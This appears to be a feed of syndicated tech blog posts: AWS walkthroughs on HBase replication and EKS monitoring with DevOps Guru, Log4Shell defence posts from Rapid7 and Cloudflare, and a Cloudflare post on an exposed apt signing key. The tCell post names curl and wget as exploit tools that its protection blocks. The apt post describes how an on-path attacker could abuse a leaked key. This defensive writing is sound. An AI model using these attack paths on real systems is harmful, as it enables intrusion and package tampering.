After changes are persisted as WALs and in the MemStore, the replicate method in ReplicationEndpoint is called to replicate a collection of WAL entries, and it returns a Boolean (true/false) value. If the returned value is true, HBase considers the entries successfully replicated and calls the replicate method for the next batch of WAL entries. Depending on configuration, both the KPL and Kafka producers might buffer records for longer when configured for asynchronous writes. Failures can cause loss of entries, retries, and duplicate delivery of records to the stream, which can be detrimental whether message delivery is synchronous or asynchronous.
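
One way a custom endpoint can avoid acknowledging entries that are still sitting in a producer buffer is to flush before returning true. The sketch below is not the sample project’s actual implementation; it only illustrates the idea against HBase’s ReplicationEndpoint API, with the send and flush details left abstract:

import org.apache.hadoop.hbase.replication.BaseReplicationEndpoint;
import org.apache.hadoop.hbase.wal.WAL;

import java.util.List;

public abstract class FlushBeforeAckEndpoint extends BaseReplicationEndpoint {

    // Sends one serialized WAL entry to the stream; provided by the concrete sink.
    protected abstract boolean sendToStream(WAL.Entry entry);

    // Blocks until all buffered records are acknowledged by the stream
    // (for example, a KPL flushSync or Kafka producer flush).
    protected abstract boolean flushOutstandingRecords();

    @Override
    public boolean replicate(ReplicateContext replicateContext) {
        List<WAL.Entry> entries = replicateContext.getEntries();
        for (WAL.Entry entry : entries) {
            if (!sendToStream(entry)) {
                return false; // HBase retries the batch, which may cause duplicate delivery
            }
        }
        // Only report success once buffered asynchronous writes are delivered; otherwise
        // a crash could lose entries that HBase already considers replicated.
        return flushOutstandingRecords();
    }
}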

If your operations aren’t idempotent, you can checkpoint or check for unique sequence numbers on the consumer side. For simple HBase record replication, RowKey operations are idempotent and carry a timestamp and sequence ID.

Summary

Replication of HBase WALEdits into streams is a powerful tool that you can use in multiple use cases and in combination with other AWS services. You can create practical solutions to further process records in real time, audit the data, detect anomalies, set triggers on ingested data, or archive data in streams to be replayed on other HBase databases or storage services from a point in time. This post outlined some common use cases and solutions, along with some best practices when implementing your custom HBase streaming replication endpoints.

Review, clone, and try our HBase replication endpoint implementation from our GitHub repository and launch our sample CloudFormation template.

We’d like to learn about your use cases. If you have questions or suggestions, please leave a comment.


About the Authors

Amir Shenavandeh is a Senior Hadoop systems engineer and Amazon EMR subject matter expert at Amazon Web Services. He helps customers with architectural guidance and optimization. He leverages his experience to help people bring their ideas to life, focusing on distributed processing and big data architectures.

Maryam Tavakoli is a Cloud Engineer and Amazon OpenSearch subject matter expert at Amazon Web Services. She helps customers optimize their analytics and streaming workloads and is passionate about solving complex problems with a simple user experience that empowers customers to be more productive.

Automate Container Anomaly Monitoring of Amazon Elastic Kubernetes Service Clusters with Amazon DevOps Guru

Post Syndicated from Rahul Sharad Gaikwad original https://aws.amazon.com/blogs/devops/automate-container-anomaly-monitoring-of-amazon-elastic-kubernetes-service-clusters-with-amazon-devops-guru/

Observability in a container-centric environment presents new challenges for operators due to the increasing number of abstractions and supporting infrastructure. In many cases, organizations can have hundreds of clusters and thousands of services, tasks, and pods running concurrently. This post demonstrates new features in Amazon DevOps Guru that help simplify and expand the capabilities of the operator. The features include grouping anomalies by metric and container cluster to improve context and simplify access, as well as support for additional Amazon CloudWatch Container Insights metrics. For example, Amazon DevOps Guru can now identify anomalies in CPU, memory, or networking within Amazon Elastic Kubernetes Service (Amazon EKS), notify operators, and let them navigate more easily to the affected cluster to examine the collected data.

Amazon DevOps Guru offers a fully managed AIOps platform service that lets developers and operators improve application availability and resolve operational issues faster. It minimizes manual effort by leveraging machine learning (ML) powered recommendations. Its ML models take advantage of the expertise of AWS in operating highly available applications for the world’s largest ecommerce business for over 20 years. DevOps Guru automatically detects operational issues, predicts impending resource exhaustion, details likely causes, and recommends remediation actions.

Solution Overview

In this post, we will demonstrate the new Amazon DevOps Guru features around cluster grouping and additionally supported Amazon EKS metrics. To demonstrate these features, we will show you how to create a Kubernetes cluster, instrument the cluster using AWS Distro for OpenTelemetry, and then configure Amazon DevOps Guru to automate anomaly detection of EKS metrics. A previous blog provides detail on the AWS Distro for OpenTelemetry collector that is employed here.

Prerequisites

To follow this walkthrough, you need an AWS account and the eksctl and kubectl command line tools installed and configured.

EKS Cluster Creation

We use the eksctl CLI tool to create an Amazon EKS cluster. With eksctl, you can provide details on the command line or specify a manifest file. The following manifest creates a single managed node on Amazon Elastic Compute Cloud (Amazon EC2), constrained to the specified Region via the metadata/region entry and to specific Availability Zones via the managedNodeGroups/availabilityZones entry. By default, this creates a new VPC with eight subnets.

# An example of ClusterConfig object using Managed Nodes
---
    apiVersion: eksctl.io/v1alpha5
    kind: ClusterConfig

    metadata:
      name: devopsguru-eks-cluster
      region: <SPECIFY_REGION_HERE>
      version: "1.21"

    availabilityZones: ["<FIRST_AZ>","<SECOND_AZ>"]
    managedNodeGroups:
      - name: managed-ng-private
        privateNetworking: true
        instanceType: t3.medium
        minSize: 1
        desiredCapacity: 1
        maxSize: 6
        availabilityZones: ["<SPECIFY_AVAILABILITY_ZONE(S)_HERE"]
        volumeSize: 20
        labels: {role: worker}
        tags:
          nodegroup-role: worker
    cloudWatch:
      clusterLogging:
        enableTypes:
          - "api"
  • To create an Amazon EKS cluster using eksctl and a manifest file, we use eksctl create as shown below. Note that this step will take 10 – 15 minutes to establish the cluster.
$ eksctl create cluster -f devopsguru-managed-node.yaml
2021-10-13 10:44:53 [i] eksctl version 0.69.0
…
2021-10-13 11:04:42 [✔] all EKS cluster resources for "devopsguru-eks-cluster" have been created
2021-10-13 11:04:44 [i] nodegroup "managed-ng-private" has 1 node(s)
2021-10-13 11:04:44 [i] node "<ip>.<region>.compute.internal" is ready
2021-10-13 11:04:44 [i] waiting for at least 1 node(s) to become ready in "managed-ng-private"
2021-10-13 11:04:44 [i] nodegroup "managed-ng-private" has 1 node(s)
2021-10-13 11:04:44 [i] node "<ip>.<region>.compute.internal" is ready
2021-10-13 11:04:47 [i] kubectl command should work with "/Users/<user>/.kube/config"
  • Once this is complete, you can use kubectl, the Kubernetes CLI, to access the managed nodes that are running.
$ kubectl get nodes
NAME STATUS ROLES AGE VERSION
<ip>.<region>.compute.internal Ready <none> 76m v1.21.4-eks-033ce7e

AWS Distro for OpenTelemetry Collector Installation

We will use the AWS Distro for OpenTelemetry Collector to extract metrics from a pod running in Amazon EKS. It collects metrics within the Kubernetes cluster and surfaces them to Amazon CloudWatch. We start by attaching an IAM policy that allows this access. The following information comes from the post here.

Attach the CloudWatchAgentServerPolicy IAM policy to the worker node

  • Open the Amazon EC2 console.
  • Select one of the worker node instances, and choose the IAM role in the description.
  • On the IAM role page, choose Attach policies.
  • In the list of policies, select the check box next to CloudWatchAgentServerPolicy. You can use the search box to find this policy.
  • Choose Attach policies.

Deploy AWS OpenTelemetry Collector on Amazon EKS

Next, you will deploy the AWS Distro for OpenTelemetry using a GitHub hosted manifest.

  • Deploy the artifact to the Amazon EKS cluster using the following command:
$ curl https://raw.githubusercontent.com/aws-observability/aws-otel-collector/main/deployment-template/eks/otel-container-insights-infra.yaml | kubectl apply -f -
  • View the resources in the aws-otel-eks namespace.
$ kubectl get pods -l name=aws-otel-eks-ci -n aws-otel-eks
NAME READY STATUS RESTARTS AGE
aws-otel-eks-ci-jdf2w 1/1 Running 0 107m

View Container Insight Metrics in Amazon CloudWatch

Access Amazon CloudWatch and select Metrics, All metrics to view the published metrics. Under Custom Namespaces, ContainerInsights is selectable. Under this namespace, you can view metrics at the cluster, node, pod, namespace, and service granularity. The following example shows pod-level CPU metrics:

The AWS Console with Amazon Cloudwatch Container Insights Pod Level CPU Utilization.

Amazon Simple Notification Service

Amazon DevOps Guru needs permission to publish to Amazon SNS so that it can send notification events. During the setup process, an Amazon SNS topic is created, and the following resource policy is applied:

{
    "Sid": "DevOpsGuru-added-SNS-topic-permissions",
    "Effect": "Allow",
    "Principal": {
        "Service": "region-id.devops-guru.amazonaws.com"
    },
    "Action": "sns:Publish",
    "Resource": "arn:aws:sns:region-id:topic-owner-account-id:my-topic-name",
    "Condition" : {
      "StringEquals" : {
        "AWS:SourceArn": "arn:aws:devops-guru:region-id:topic-owner-account-id:channel/devops-guru-channel-id",
        "AWS:SourceAccount": "topic-owner-account-id"
    }
  }
}

Amazon DevOps Guru

Amazon DevOps Guru can now be leveraged to monitor the Amazon EKS cluster and managed node group. To do this, open Amazon DevOps Guru and select Get started, as shown in the following figure.

The Amazon DevOps Guru service via the AWS Console.

Once selected, the Get started page displays, letting you specify the IAM role that allows DevOps Guru to access the appropriate resources.

The Get started dialog for Amazon DevOps Guru including instructions on how the service operates, IAM Role Permissions and Amazon DevOps Guru analysis coverage.

Under Amazon DevOps Guru analysis coverage, select Choose later. This lets us specify the CloudFormation stacks to monitor. Select Create a new SNS topic, and provide a name; this topic collects notifications and lets subscribers be notified. Select Enable when complete.

The Amazon DevOps Guru analysis coverage allowing the user to select all resources in a region or to choose later. In addition the image shows the dialog that requests the user specify an Amazon SNS topic for notification when insights occur.

On the Manage DevOps Guru analysis coverage, select Analyze all AWS resources in the specified CloudFormation stacks in this Region. Then, select the cluster and managed node group AWS CloudFormation stacks so that DevOps Guru can monitor Amazon EKS.

A dialog where the user is able to specify the AWS CloudFormation stacks in a region for analysis coverage. Two stacks are select including the eks cluster and eks cluster managed node group.

Once this is selected, the display will update indicating that two CloudFormation stacks were added.

Amazon DevOps Guru Settings including DevOps Guru analysis coverage and Amazon SNS notifications.

Amazon DevOps Guru will then start analyzing those two stacks. It takes several hours for DevOps Guru to collect data and identify normal operating conditions. Once this process is complete, the dashboard will show that those resources have been analyzed, as shown in the following figure.

The completed analysis by DevOps guru of the two AWS Cloudformation stacks indicating a healthy status for both.

Enable Encryption on Amazon SNS Topic

The Amazon SNS topic created by Amazon DevOps Guru does not have encryption enabled by default. It is important to enable this feature to encrypt notifications at rest. Go to Amazon SNS, select the topic that was created, and then choose Edit topic. Open the Encryption dialog box and enable encryption as shown in the following figure, specifying a KMS key alias or accepting the default.

The Encryption dialog for Amazon SNS topic when it is Edited.

Deploy Sample Application on Amazon EKS To Trigger Insights

You will employ a sample application that is part of the AWS Distro for OpenTelemetry Collector to simulate failure. Using the following manifest, you will deploy a sample application that has pod resource limits for memory and CPU shares. These limits are artificially low and insufficient for the pod to run. The pod will exceed its memory limit and be identified for eviction by Amazon EKS. When it is evicted, it will be redeployed per the manifest’s requirement of one replica, which in turn repeats the process and generates memory and pod restart errors in Amazon CloudWatch. For this example, the deployment was left running for over an hour, causing the pod failure to repeat numerous times. The following is the manifest that you will create on the filesystem.

kind: Deployment
apiVersion: apps/v1
metadata:
  name: java-sample-app
  namespace: aws-otel-eks
  labels:
    name: java-sample-app
spec:
  replicas: 1
  selector:
    matchLabels:
      name: java-sample-app
  template:
    metadata:
      labels:
        name: java-sample-app
    spec:
      containers:
        - name: aws-otel-emitter
          image: aottestbed/aws-otel-collector-java-sample-app:0.9.0
          resources:
            limits:
              memory: "128Mi"
              cpu: "200m"
          ports:
          - containerPort: 4567
          env:
          - name: OTEL_OTLP_ENDPOINT
            value: "localhost:4317"
          - name: OTEL_RESOURCE_ATTRIBUTES
            value: "service.namespace=AWSObservability,service.name=CloudWatchEKSService"
          - name: S3_REGION
            value: "us-east-1"
          imagePullPolicy: Always

To deploy the application, use the following command:

$ kubectl apply -f <manifest file name>
deployment.apps/java-sample-app created

Scenario: Improved context from DevOps Guru Container Cluster Grouping and Increased Metrics

For our scenario, Amazon DevOps Guru is monitoring additional Amazon CloudWatch Container Insight Metrics for EKS. The following figure shows the flow of information and eventual notification of the operator, so that they can examine the Amazon DevOps Guru Insight. Starting at step 1, the container agent (AWS Distro for OpenTelemetry) forwards container metrics to Amazon CloudWatch. In step 2, Amazon DevOps Guru is continually consuming those metrics and performing anomaly detection. If an anomaly is detected, then this generates an Insight, thereby triggering Amazon SNS notification as shown in step 3. In step 4, the operators access Amazon DevOps Guru console to examine the insight. Then, the operators can leverage the new user interface capability displaying which cluster, namespace, and pod/service is impacted along with correlated Amazon EKS metric(s).

Architecture diagram: container metrics flow from the AWS Distro for OpenTelemetry agent to Amazon CloudWatch, are analyzed by Amazon DevOps Guru, and trigger an Amazon SNS notification that leads the operator to the insight in the DevOps Guru console.

New EKS Container Metrics in DevOps Guru

As part of the release, the following pod and node metrics are now tracked by DevOps Guru:

  • pod_number_of_container_restarts – number of times that a pod is restarted (e.g., image pull issues, container failure).
  • pod_memory_utilization_over_pod_limit – memory that exceeds the pod limit called out in resource memory limits.
  • pod_cpu_utilization_over_pod_limit – CPU shares that exceed the pod limit called out in resource CPU limits.
  • pod_cpu_utilization – percent CPU Utilization within an active pod.
  • pod_memory_utilization – percent memory utilization within an active pod.
  • node_network_total_bytes – total bytes over the network interface for the managed node (e.g., EC2 instance).
  • node_filesystem_utilization – percent file system utilization for the managed node (e.g., EC2 instance).
  • node_cpu_utilization – percent CPU Utilization within a managed node (e.g., EC2 instance).
  • node_memory_utilization – percent memory utilization within a managed node (e.g., EC2 instance).
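
As a quick way to see the raw data behind one of these metrics, you can query Amazon CloudWatch directly. The sketch below uses the AWS SDK for Java v2 and the cluster, namespace, and pod names from this walkthrough; adjust them for your environment:

import software.amazon.awssdk.services.cloudwatch.CloudWatchClient;
import software.amazon.awssdk.services.cloudwatch.model.Dimension;
import software.amazon.awssdk.services.cloudwatch.model.GetMetricDataRequest;
import software.amazon.awssdk.services.cloudwatch.model.GetMetricDataResponse;
import software.amazon.awssdk.services.cloudwatch.model.Metric;
import software.amazon.awssdk.services.cloudwatch.model.MetricDataQuery;
import software.amazon.awssdk.services.cloudwatch.model.MetricStat;

import java.time.Instant;
import java.time.temporal.ChronoUnit;

public class ContainerRestartQuery {
    public static void main(String[] args) {
        try (CloudWatchClient cloudWatch = CloudWatchClient.create()) {
            // pod_number_of_container_restarts for the sample pod deployed earlier in this post.
            Metric metric = Metric.builder()
                    .namespace("ContainerInsights")
                    .metricName("pod_number_of_container_restarts")
                    .dimensions(
                            Dimension.builder().name("ClusterName").value("devopsguru-eks-cluster").build(),
                            Dimension.builder().name("Namespace").value("aws-otel-eks").build(),
                            Dimension.builder().name("PodName").value("java-sample-app").build())
                    .build();

            MetricDataQuery query = MetricDataQuery.builder()
                    .id("restarts")
                    .metricStat(MetricStat.builder()
                            .metric(metric)
                            .period(60)       // 60-second resolution, matching the SNS payload shown below
                            .stat("Average")
                            .build())
                    .build();

            GetMetricDataResponse response = cloudWatch.getMetricData(GetMetricDataRequest.builder()
                    .startTime(Instant.now().minus(1, ChronoUnit.HOURS))
                    .endTime(Instant.now())
                    .metricDataQueries(query)
                    .build());

            response.metricDataResults().forEach(result ->
                    System.out.println(result.id() + ": " + result.values()));
        }
    }
}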

Operator Scenario

The operator in the following figure is informed of an insight via Amazon SNS. The Amazon SNS message content appears in the following code, showing the originator and information identifying the InsightDescription, InsightSeverity, the name of the container metric, and the pod and EKS cluster:

{
 "AccountId": "XXXXXXX",
 "Region": "<REGION>",
 "MessageType": "NEW_INSIGHT",
 "InsightId": "ADFl69Pwq1Aa6M373DhU0zkAAAAAAAAABuZzSBHxeiNexxnLYD7Lhb0vuwY9hLtz",
 "InsightUrl": "https://<REGION>.console.aws.amazon.com/devops-guru/#/insight/reactive/ADFl69Pwq1Aa6M373DhU0zkAAAAAAAAABuZzSBHxeiNexxnLYD7Lhb0vuwY9hLtz",
 "InsightType": "REACTIVE",
 "InsightDescription": "ContainerInsights pod_number_of_container_restarts Anomalous In Stack eksctl-devopsguru-eks-cluster-cluster",
 "InsightSeverity": "high",
 "StartTime": 1636147920000,
 "Anomalies": [
 {
 "Id": "ALAGy5sIITl9e6i66eo6rKQAAAF88gInwEVT2WRSTV5wSTP8KWDzeCYALulFupOQ",
 "StartTime": 1636147800000,
 "SourceDetails": [
 {
 "DataSource": "CW_METRICS",
 "DataIdentifiers": {
 "name": "pod_number_of_container_restarts",
 "namespace": "ContainerInsights",
 "period": "60",
 "stat": "Average",
 "unit": "None",
 "dimensions": "{\"PodName\":\"java-sample-app\",\"ClusterName\":\"devopsguru-eks-cluster\",\"Namespace\":\"aws-otel-eks\"}"
 }
 ....
 "awsInsightSource": "aws.devopsguru"
}

The Amazon DevOps Guru console collects the insights under the Insights section, as shown in the following figure. Select an insight to view its details.

Amazon DevOps Guru Insights. An insight is displayed with a status of Ongoing and Severity of High.

The Aggregated metrics view identifies the EKS container metrics that are anomalous; in this case, pod_memory_utilization_over_pod_limit and pod_number_of_container_restarts.

Aggregated Metrics panel with pod_memory_utilization_over_pod_limit and pod_number_of_container_restarts for the Amazon EKS cluster names devopsguru-eks-cluster. Graphically a timeline including time and date is displayed conveying the length of the anomaly.

Further details can be identified by selecting and expanding each insight as shown in the following figure.

Displays the ability to expand the cluster metrics providing further information on the PodName, Namespace and ClusterName. Furthermore, a search bar is provided to search on name, stack or service name.

Note that the display provides information around the Cluster, PodName, and Namespace. This helps operators maintaining large numbers of EKS Clusters to quickly isolate the offending Pod, its operating Namespace, and EKS Cluster to which it belongs. A search bar provides further filtering to isolate the name, stack, or service name displayed.

Cleaning Up

Follow the steps to delete the resources to prevent additional charges being posted to your account.

Amazon EKS Cluster Cleanup

Follow these steps to detach the customer managed policy and delete the cluster.

  • Detach customer managed policy, AWSDistroOpenTelemetryPolicy, via IAM Console.
  • Delete cluster using eksctl.
$ eksctl delete cluster devopsguru-eks-cluster --region <region>
2021-10-13 14:08:28 [i] eksctl version 0.69.0
2021-10-13 14:08:28 [i] using region <region>
2021-10-13 14:08:28 [i] deleting EKS cluster "devopsguru-eks-cluster"
2021-10-13 14:08:30 [i] will drain 0 unmanaged nodegroup(s) in cluster "devopsguru-eks-cluster"
2021-10-13 14:08:32 [i] deleted 0 Fargate profile(s)
2021-10-13 14:08:33 [✔] kubeconfig has been updated
2021-10-13 14:08:33 [i] cleaning up AWS load balancers created by Kubernetes objects of Kind Service or Ingress
2021-10-13 14:09:02 [i] 2 sequential tasks: { delete nodegroup "managed-ng-private", delete cluster control plane "devopsguru-eks-cluster" [async] }
2021-10-13 14:09:02 [i] will delete stack "eksctl-devopsguru-eks-cluster-nodegroup-managed-ng-private"
2021-10-13 14:09:02 [i] waiting for stack "eksctl-devopsguru-eks-cluster-nodegroup-managed-ng-private" to get deleted
2021-10-13 14:12:30 [i] will delete stack "eksctl-devopsguru-eks-cluster-cluster"
2021-10-13 14:12:30 [✔] all cluster resources were deleted

Conclusion

The previous scenarios demonstrated the new cluster grouping and the additional container metrics. Both features further simplify and expand an operator’s ability to identify issues within a container cluster when Amazon DevOps Guru detects anomalies. You can start building your own solutions that employ the Amazon CloudWatch agent or AWS Distro for OpenTelemetry agent and Amazon DevOps Guru by reading the documentation, which provides a conceptual overview and practical examples to help you understand the features provided by Amazon DevOps Guru and how to use them.

About the authors

Rahul Sharad Gaikwad

Rahul Sharad Gaikwad is a Lead Consultant – DevOps with AWS. He helps customers and partners on their Cloud and DevOps adoption journey. He is passionate about technology and enjoys collaborating with customers. In his spare time, he focuses on his PhD Research work. He also enjoys gymming and spending time with his family.

Leo Da Silva

Leo Da Silva is a Partner Solution Architect Manager at AWS and uses his knowledge to help customers better utilize cloud services and technologies. Over the years, he had the opportunity to work in large, complex environments, designing, architecting, and implementing highly scalable and secure solutions to global companies. He is passionate about football, BBQ, and Jiu Jitsu — the Brazilian version of them all.

Chris Riley

Chris Riley is a Senior Solutions Architect working with Strategic Accounts providing support in Industry segments including Healthcare, Financial Services, Public Sector, Automotive and Manufacturing via Managed AI/ML Services, IoT and Serverless Services.

Security updates for Wednesday

Post Syndicated from original https://lwn.net/Articles/878749/rss

Security updates have been issued by Fedora (libopenmpt), openSUSE (icu.691, log4j, nim, postgresql10, and xorg-x11-server), Red Hat (idm:DL1), SUSE (gettext-runtime, icu.691, runc, storm, storm-kit, and xorg-x11-server), and Ubuntu (xorg-server, xorg-server-hwe-18.04, xwayland).

How to Protect Your Applications Against Log4Shell With tCell

Post Syndicated from Bria Grangard original https://blog.rapid7.com/2021/12/15/how-to-protect-your-applications-against-log4shell-with-tcell/

By now, we’re sure you’re familiar with all things Log4Shell – but we want to make sure we share how to protect your applications. Applications are a critical part of any organization’s attack surface, and we’re seeing thousands of Log4Shell attack attempts in our customers’ environments every hour. Let’s walk through the various ways tCell can help our customers protect against Log4Shell attacks.

1. Monitor for any Log4Shell attack attempts

tCell is a web application and API protection solution with traditional web application firewall monitoring capabilities, such as monitoring attacks. Over the weekend, we launched a new App Firewall detection for all tCell customers. This means tCell customers can leverage our App Firewall functionality to determine whether any Log4Shell attack attempts have taken place, and from there drill into more information on the events that took place. The video below walks through how to detect Log4Shell attack attempts using the App Firewall feature in tCell.



Video: Detecting Log4Shell attack attempts with the tCell App Firewall.

As a reminder, customers will need to make sure they have deployed the JVM agent on their apps to begin monitoring their applications’ activity. Make sure to check out our Quick Start Guide if you need help setting up tCell.

2. Block against Log4Shell attacks

Monitoring is great, but what you may be looking for is something that protects your application by blocking Log4Shell attack attempts. To do this, we’ve added a default pattern (tc-cmdi-4) for customers to block against. Below is a video on how to set up this custom block rule; reach out to the tCell team if you need any assistance rolling this out at scale.



Video: Setting up a custom block rule with the tc-cmdi-4 pattern in tCell.

As research continues and new patterns are identified, we will provide updates to tc-cmdi-4 to improve coverage. Customers have already noted that the new default pattern provides broader protection coverage than the earlier pattern.

3. Identify vulnerable packages (such as CVE-2021-44228)

We’ve heard from customers that they’re unsure whether their applications are using the vulnerable package. With tCell, we will alert you if any vulnerable packages (such as those affected by CVE-2021-44228 and CVE-2021-45046) are loaded by the application at runtime. The best way to eliminate the risk exposure for Log4Shell is to upgrade any vulnerable packages to 2.16. Check out the video below for more information.



Video: Identifying vulnerable Log4j packages loaded at runtime with tCell.

If you would like to provide additional checks outside of the vulnerable packages check at runtime, please refer to our blog on how InsightVM can help you do this.

4. Enable OS commands

One of the benefits of using tCell’s app server agents is that you can enable blocking of OS commands. This prevents a wide range of exploits that leverage tools like curl, wget, etc. Below you’ll find a picture of how to enable OS command protection (either report only, or block and report).

Screenshot: Enabling OS command protection in tCell.

5. Detect and block suspicious actors

All events that are detected by the App Firewall in tCell are fed into the analytics engine to determine Suspicious Actors. The Suspicious Actors feature takes in multiple inputs (such as failed logins, injections, unusual inputs, etc.) and correlates these to an IP address.

Screenshot: The Suspicious Actors view in tCell.

Not only can you monitor for suspicious actors with tCell, but you can also configure tCell to block all activity or just the suspicious activity from the malicious actor’s IP.

Screenshot: Configuring tCell to block activity from a suspicious actor's IP.

All the components together make the magic happen

The power of tCell isn’t in one or two features, but rather in its robust capability set, which we believe is required to secure any environment with a defense-in-depth approach. We help customers not only identify vulnerable Log4j packages that are being used, but also monitor for suspicious activity and block attacks. The best security comes from having multiple types of defenses available to protect against bad actors, which is why the capabilities mentioned here will prove valuable in protecting against Log4Shell and future threats.

Get more critical insights about defending against Log4Shell

Check out our resource center

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Post Syndicated from Gabriel Gabor original https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Hot on the heels of CVE-2021-44228, a second Log4J CVE has been filed: CVE-2021-45046. The rules that we previously released for CVE-2021-44228 give the same level of protection for this new CVE.

This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0. The latest version can be found on the Log4J download page.

Customers using the Cloudflare WAF have three rules to help mitigate any exploit attempts:

  • Rule 100514 (legacy WAF) / 6b1cc72dff9746469d4695a474430f12 (new WAF) – Log4J Headers – default action: BLOCK
  • Rule 100515 (legacy WAF) / 0c054d4e4dd5455c9ff8f01efe5abb10 (new WAF) – Log4J Body – default action: BLOCK
  • Rule 100516 (legacy WAF) / 5f6744fa026a4638bda5b3d7d5e015dd (new WAF) – Log4J URL – default action: BLOCK

The mitigation has been split across three rules inspecting HTTP headers, body and URL respectively.

In addition to the above rules, we have also released a fourth rule that protects against a much wider range of attacks, at the cost of a higher false positive rate. For that reason, we have made it available but not set it to BLOCK by default:

  • Rule 100517 (legacy WAF) / 2c5413e155db4365befe0df160ba67d7 (new WAF) – Log4J Advanced URI, Headers – default action: DISABLED

Who is affected

Log4J is a powerful Java-based logging library maintained by the Apache Software Foundation.

In all Log4J versions >= 2.0-beta9 and <= 2.14.1, JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

In addition, the previous mitigations for CVE-2021-44228, as seen in version 2.15.0, were not adequate to protect against CVE-2021-45046.

An exposed apt signing key and how to improve apt security

Post Syndicated from Jeff Hiner original https://blog.cloudflare.com/dont-use-apt-key/

An exposed apt signing key and how to improve apt security

Recently, we received a bug bounty report regarding the GPG signing key used for pkg.cloudflareclient.com, the Linux package repository for our Cloudflare WARP products. The report stated that this private key had been exposed. We’ve since rotated this key and we are taking steps to ensure a similar problem can’t happen again. Before you read on, if you are a Linux user of Cloudflare WARP, please follow these instructions to rotate the Cloudflare GPG Public Key trusted by your package manager. This only affects WARP users who have installed WARP on Linux. It does not affect Cloudflare customers of any of our other products or WARP users on mobile devices.

But we also realized that the impact of an improperly secured private key can have consequences that extend beyond the scope of one third-party repository. The remainder of this blog shows how to improve the security of apt with third-party repositories.

The unexpected impact

At first, we thought that the exposed signing key could only be used by an attacker to forge packages distributed through our package repository. However, when reviewing impact for Debian and Ubuntu platforms we found that our instructions were outdated and insecure. In fact, we found the majority of Debian package repositories on the Internet were providing the same poor guidance: download the GPG key from a website and then either pipe it directly into apt-key or copy it into /etc/apt/trusted.gpg.d/. This method adds the key as a trusted root for software installation from any source. To see why this is a problem, we have to understand how apt downloads and verifies software packages.

How apt verifies packages

In the early days of Linux, package maintainers wanted to make sure users could trust that the software being installed on their machines came from a trusted source.

Apt has a list of places to pull packages from (sources) and a method to validate those sources (trusted public keys). Historically, the keys were stored in a single keyring file: /etc/apt/trusted.gpg. Later, as third party repositories became more common, apt could also look inside /etc/apt/trusted.gpg.d/ for individual key files.

What happens when you run apt update? First, apt fetches a signed file called InRelease from each source. Some servers supply separate Release and signature files instead, but they serve the same purpose. InRelease is a file containing metadata that can be used to cryptographically validate every package in the repository. Critically, it is also signed by the repository owner’s private key. As part of the update process, apt verifies that the InRelease file has a valid signature, and that the signature was generated by a trusted root. If everything checks out, a local package cache is updated with the repository’s contents. This cache is directly used when installing packages. The chain of signed InRelease files and cryptographic hashes ensures that each downloaded package hasn’t been corrupted or tampered with along the way.

Diagram: the chain of signed InRelease files and cryptographic hashes that apt uses to verify packages.

A typical third-party repository today

For most Ubuntu/Debian users today, this is what adding a third-party repository looks like in practice:

  1. Add a file in /etc/apt/sources.list.d/ telling apt where to look for packages.
  2. Add the gpg public key to /etc/apt/trusted.gpg.d/, probably via apt-key.

If apt-key is used in the second step, the command typically pops up a deprecation warning, telling you not to use apt-key. There’s a good reason: adding a key like this trusts it for any repository, not just the source from step one. This means if the private key associated with this new source is compromised, attackers can use it to bypass apt’s signature verification and install their own packages.

What would this type of attack look like? Assume you’ve got a stock Debian setup with a default sources list [1]:

deb http://deb.debian.org/debian/ bullseye main non-free contrib
deb http://security.debian.org/debian-security bullseye-security main contrib non-free

At some point you installed a trusted key that was later exposed, and the attacker has the private key. This key was added alongside a source pointing at https, assuming that even if the key is broken an attacker would have to break TLS encryption as well to install software via that route.

You’re enjoying a hot drink at your local cafe, where someone nefarious has managed to hack the router without your knowledge. They’re able to intercept http traffic and modify it. An auto-update script on your laptop runs apt update. The attacker pretends to be deb.debian.org, and because at least one source is configured to use http, the attacker doesn’t need to break https. They return a modified InRelease file signed with the compromised key, indicating that a newer update of the bash package is available. apt pulls the new package (again from the attacker) and installs it, as root. Now you’ve got a big problem [2].

A better way

It seems the way most folks are told to set up third-party Debian repositories is wrong. What if you could tell apt to only trust that GPG key for a specific source? That, combined with the use of https, would significantly reduce the impact of a key compromise. As it turns out, there’s a way to do that! You’ll need to do two things:

  1. Make sure the key isn’t in /etc/apt/trusted.gpg or /etc/apt/trusted.gpg.d/ anymore. If the key is its own file, the easiest way to do this is to move it to /usr/share/keyrings/. Make sure the file is owned by root, and only root can write to it. This step is important, because it prevents apt from using this key to check all repositories in the sources list.
  2. Modify the sources file in /etc/apt/sources.list.d/ telling apt that this particular repository can be “signed by” a specific key. When you’re done, the line should look like this:

deb [signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main

Some source lists contain other metadata indicating that the source is only valid for certain architectures. If that’s the case, just add a space in the middle, like so:

deb [amd64 signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main

We’ve updated the instructions on our own repositories for the WARP Client and Cloudflare with this information, and we hope others will follow suit.

If you run apt-key list on your own machine, you’ll probably find several keys that are trusted far more than they should be. Now you know how to fix them!

For those running your own repository, now is a great time to review your installation instructions. If your instructions tell users to curl a public key file and pipe it straight into sudo apt-key, maybe there’s a safer way. While you’re in there, ensuring the package repository supports https is a great way to add an extra layer of security (and if you host your traffic via Cloudflare, it’s easy to set up and free; you can follow this blog post to learn how to properly configure Cloudflare to cache Debian packages).


[1] RPM-based distros like Fedora, CentOS, and RHEL also use a common trusted GPG store to validate packages, but since they generally use https by default to fetch updates, they aren’t vulnerable to this particular attack.
[2] The attack described above requires an active on-path network attacker. If you are using the WARP client or Cloudflare for Teams to tunnel your traffic to Cloudflare, your network traffic cannot be tampered with on local networks.

Green information technology and classroom discussions

Post Syndicated from Gemma Coleman original https://www.raspberrypi.org/blog/green-information-technology-climate-change-data-centre-e-waste-hello-world/

The global IT industry generates as much CO2 as the aviation industry. In Hello World issue 17, we learn about the hidden impact of our IT use and the changes we can make from Beverly Clarke, national community manager for Computing at School and author of Computer Science Teacher: Insight Into the Computing Classroom.

